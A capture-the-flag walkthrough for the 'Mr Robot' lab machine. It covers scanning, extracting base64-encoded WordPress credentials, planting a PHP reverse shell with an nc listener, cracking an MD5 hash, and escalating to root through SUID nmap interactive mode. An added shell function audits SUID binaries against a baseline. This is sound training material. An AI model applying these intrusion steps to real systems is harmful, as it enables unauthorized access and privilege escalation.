Mr Robot
Key 1
nmap -sC -sV 10.10.245.29
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-15 01:51 GMT
Nmap scan report for 10.10.245.29
Host is up (0.055s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.68 seconds
curl -s http://10.10.245.29/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
curl -s http://10.10.245.29/key-1-of-3.txt
key1
Key 2
fsocity.dic appears to be a dictionary file of usernames and passwords.
Nikto
nikto -h 10.10.245.29
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.245.29
+ Target Hostname: 10.10.245.29
+ Target Port: 80
+ Start Time: 2022-12-15 02:07:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://10.10.245.29/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7889 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2022-12-15 02:20:20 (GMT0) (783 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Gobuster
gobuster dir -u http://10.10.245.29 -w /usr/share/wordlists/dirb/common.txt -o directories.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.245.29
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 02:29:45 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.245.29/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.245.29/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.245.29/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.245.29/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.245.29/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.245.29/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/]
/images (Status: 301) [Size: 235] [--> http://10.10.245.29/images/]
/Image (Status: 301) [Size: 0] [--> http://10.10.245.29/Image/]
/image (Status: 301) [Size: 0] [--> http://10.10.245.29/image/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.245.29/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.245.29/js/]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> http://10.10.245.29/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.245.29/]
/phpmyadmin (Status: 403) [Size: 94]
/readme (Status: 200) [Size: 64]
/rdf (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/rdf/]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/]
/rss (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.245.29/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.245.29/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.245.29/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.245.29/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-load (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-mail (Status: 500) [Size: 3064]
/wp-login (Status: 200) [Size: 2664]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.245.29/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
Progress: 4614 / 4615 (99.98%)
===============================================================
2022/12/15 02:37:48 Finished
===============================================================
Oh hey, a wp-login. And Nikto also flagged: OSVDB-3092: /license.txt: License file found may identify site software.
License
curl -s http://10.10.245.29/license | tr -d "\n"
blabla ZWxsaW90OkVSMjgtMDY1Mgo=
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652
Log in with those credentials at http://10.10.245.29/wp-login.
Replace 404.php with the pentestmonkey PHP reverse shell, and open a listener on the Kali machine.
nc -nlvp 1234
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.245.29.
Ncat: Connection from 10.10.245.29:49295.
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
02:57:09 up 1:06, 0 users, load average: 0.00, 0.10, 0.74
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home/robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
Look up the MD5 hash.
Then try su - robot. Oh! su: must be run from a terminal.
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
Now su:
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
whoami
robot
$ cat key-2-of-3.txt
cat key-2-of-3.txt
Key 3
$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
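The SUID list above is where the escalation path shows up, so as an added audit step (not part of the original write-up) this shell function compares a captured list against a baseline of package-shipped SUID binaries and prints whatever is extra. The baseline list is an assumption written for this example, and the found list is the find output above embedded as constructed input.

```shell
# Added example (not from the write-up): flag SUID-root binaries missing from a baseline.
# Constructed input: the paths returned by the find command in the write-up.
FOUND_SUID='/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown'
# Assumed baseline (an assumption for this example, not a vendor manifest):
# SUID-root binaries that stock packages on this kind of Ubuntu host install.
BASELINE_SUID='/bin/ping
/bin/ping6
/bin/mount
/bin/umount
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown'
# Print each found path absent from the baseline, sorted, one per line. Paths under
# /usr/local or /opt get a tag: package managers do not install there, so a SUID
# binary in those trees was placed by hand.
unexpected_suid() {
    printf '%s\n' "$1" | sort -u | while IFS= read -r path; do
        [ -n "$path" ] || continue
        printf '%s\n' "$2" | grep -qxF -- "$path" && continue
        case "$path" in
            /usr/local/*|/opt/*) printf '%s (outside package-managed paths)\n' "$path" ;;
            *) printf '%s\n' "$path" ;;
        esac
    done
}
unexpected_suid "$FOUND_SUID" "$BASELINE_SUID"
```

On a live host the baseline is better derived from the package database (for example by checking each path with dpkg -S) than from a hand-written list; here it is fixed so the check runs offline.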
$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !ls /root
!ls /root
firstboot_done key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt